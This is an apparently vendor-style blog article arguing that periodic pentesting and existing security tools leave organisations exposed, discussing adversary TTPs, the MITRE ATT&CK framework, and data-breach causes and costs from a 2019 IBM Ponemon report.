Are companies ready for the next attack?

Today’s business ecosystems rely massively on mixed on-prem and cloud-based infrastructures. Environmental drift conditions, externalities itself are pushed to get agile security. Conversely, organizations also require more access options for more resources.

Security teams may be blind or overutilized to manage too many tools on their environments, unable to identify adversarial behaviors in real-time and hard to map their current risk profile. Otherwise, the skills shortage in the cybersecurity domain has emerged over the years, and it remains a prominent problem for organizations. To close this gap, organizations lead to manage security consultancy services such as pen-test other activities regularly but not continuously. Though the high cost of these efforts, adversaries can bypass an organization’s security stack and impact the effectiveness of security integrity frequently.

In recent years, adversarial campaigns and cybercriminal activities advance with new techniques and tactics — The old model, where company assets are isolated behind a security stack, is behind us. Gone are the days of using a static stack of applications. The current criterion requires a wide variety of apps, services, users, in-motion, and the rest data that will all require protection. Layered security on security stack that is implemented to various technology trials and keeps up with changes of threat landscape will be crucial in tackling the wide variety of threats. The testing methods like Pentesting, red-teaming helps in the wild but remain unsuccessful in the attacks we see today.

New risks and techniques will unavoidably emerge. The increased adoption of the cloud and third-party/supplier effects increases risks in every layer. Additional factors like; human error, skill-shortage, misconfigurations of technologies without fact-based threat data that produce unquestionable opportunity of exponential compromise in the networks.

As all consequences of these factors, all connected assets and networks create more incidents that unlocked doors to true-threats and breaches. Business threats will be no less complex when the organizations used in mixing common risks with a variety of technologies.

Through the Looking Glass

Implementing a security context generally applied with vendor’s threat data with CTI or Red-Team guys will go through this process manually and work with Prevention Team and use this type of context they’re building — on products.” Note that in both cases, it is not continuous, and it is very dependent on severe human effort and safety checks. Given the speeds and complexity of threats, this is not sustainable in all aspects.

Understanding the adversarial mindset isn’t just a technical level; it could be good guidance to reveal attackers’ behavior in the process likely choices of tools and tactics and procedures.

Organizations are going to be attacked if the exploit kits and techniques that work in the wild. The balance between cybersecurity experience, allowing the authority to defenders protects networks vs. attackers continued to arise.

In several cases we mentioned above, the regular non-fact intelligence context does not reduce the occurrence of the vulnerability or close gaps that exist in the security stack. We predict more threat actors targeting critical data and breaches will be expected as business software, networks, and cloud-centric platforms are being widely adopted. The more corporate data resides in the cloud, the threat actors get interested.

Is it Defensible?

Organizations can still be at risk despite regularly patching systems and assessing risk-level of the organizations all the time.

Contrary to the popular myth, threats can work in short time intervals, so they need to update their techniques so eventually continually, they don’t get caught from detection. The reason for this, if the threat-centric security controls that are not implemented properly will be a tremendous security outcome to organizations’ assets. Threats that ‘live off the land’ approach will continue to bypass traditional blacklisting techniques. Organizations will have to consider solutions with UEBA, SIEMs, sandboxing, and traffic anomaly monitoring. Given that these products could help particularly but not provided the whole picture of the kill chain process, so the attack escalation actions always missing on the table.

The cybersecurity threat landscape advances to grow as the attacks and techniques and adversaries execute the series of actions to bypassing detection technologies so efficiently. Otherwise, adversaries infrequently use a singular vector anymore. They are blending various tactics and complicated techniques to fulfill their goals. Tactics, Techniques, and Procedures (TTPs), represents the behavior of adversarial action. In this context, tactics relate to the high-level classification of adversaries. Techniques are listed descriptions about actions that stick to particular tactics. Procedures are mindset flow about how an adversary will leverage their kill-chain to perform their objective.

This could be carried items about targeted attacks to send ransom email like spearphishing attacks who they are targeting, and if they use malicious actions that contain a link or an attachment. It’s a little hard to understand, only security subject matter experts can understand criminal actions and behavior and how particular attack flows are orchestrated.

A detailed understanding of TTPs presents excellent insight into adversaries’ mind-map; even single atomic techniques can help organizations to understand, prepare, respond, and mitigate against imminent threats. MITRE ATT&CK framework is an open and excellent knowledge base that classifies adversarial tactics and techniques based on real-world samples.

The lifecycle of a data breach has emerged

A data breach is described as an incident in which an individual’s name or a financially identified record is possibly put at risk. In general Data Breaches identified as three leading causes;

• The malicious/ Threat Actor Motivated targeted criminal attack,
• System glitch
• and human error.

The costs of a data breach vary; it depends on threat profiles and the defenses in place at the time of the data breach. Malicious attacks are the most common and most expensive root-cause of breaches.

Since 2014, attacks surged by 21%, rising from 42% of breaches in 2014 to 51% of breaches in 2019. It took considerably hard to identify and maintain the breach. The breach-lifecycle was 12.5% higher than the average breach lifecycle of 279 days. These finding advocates to explain why breaches affected by a malicious attack were 27% more expensive than breaches caused by human-error ($4.45 million vs.$3.5 million) and 37% more expensive than a breach caused by system glitches ($4.45 million vs. $3.24 million). (IBM Ponemon 2019 Cost of DB Report)